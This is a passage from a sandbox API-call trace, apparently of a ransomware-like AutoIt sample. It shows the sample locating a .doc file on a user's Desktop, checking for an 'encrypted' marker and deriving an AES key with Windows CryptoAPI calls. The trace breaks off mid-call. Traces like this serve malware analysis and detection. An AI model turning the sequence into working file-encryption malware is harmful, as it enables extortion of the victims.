[0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LVwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VwyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wyHV.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.107] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.107] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0031.107] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.107] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.107] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.107] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.108] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.108] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.108] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.108] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73802d50, ftCreationTime.dwHighDateTime=0x1d5b6ba, ftLastAccessTime.dwLowDateTime=0xad2c0a0, ftLastAccessTime.dwHighDateTime=0x1d5b684, ftLastWriteTime.dwLowDateTime=0xad2c0a0, ftLastWriteTime.dwHighDateTime=0x1d5b684, nFileSizeHigh=0x0, nFileSizeLow=0x1396e, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="HaqrV LVwyHV.doc", cAlternateFileName="HAQRVL~1.DOC")) returned 0x7c2100 [0031.108] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.108] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.108] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.108] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.108] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.108] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.108] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.108] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0031.108] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.108] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.108] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0031.108] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.108] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.109] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.109] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.109] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0031.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.109] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0031.110] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.110] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.110] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0031.110] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.110] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.110] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.110] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.110] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.110] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.110] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.110] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.110] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.110] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.110] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.110] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.110] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0031.110] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.110] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.110] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.110] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.111] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.111] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.111] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.111] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.111] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.111] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.111] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.111] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.111] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.111] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.111] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.111] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.111] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.111] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.111] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.111] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0031.111] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.111] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.111] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.111] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.111] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0031.111] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.111] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.112] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.112] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.112] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.112] CryptHashData (hHash=0x7c2240, pbData=0x7c7758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0031.112] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.112] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.112] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.112] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.112] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.112] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.112] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.112] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.112] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0031.112] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.112] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.112] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.112] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.112] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.112] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.112] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0031.112] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.112] CryptDestroyHash (hHash=0x7c2240) returned 1 [0031.112] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.113] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0031.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0031.113] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.113] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.113] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0031.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.113] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\haqrv lvwyhv.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.113] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.113] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0031.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.114] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0031.114] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0031.114] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0031.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c7758 [0031.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0031.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0031.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7758 | out: hHeap=0x770000) returned 1 [0031.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0031.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0031.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0031.115] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni")) returned 0x10 [0031.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 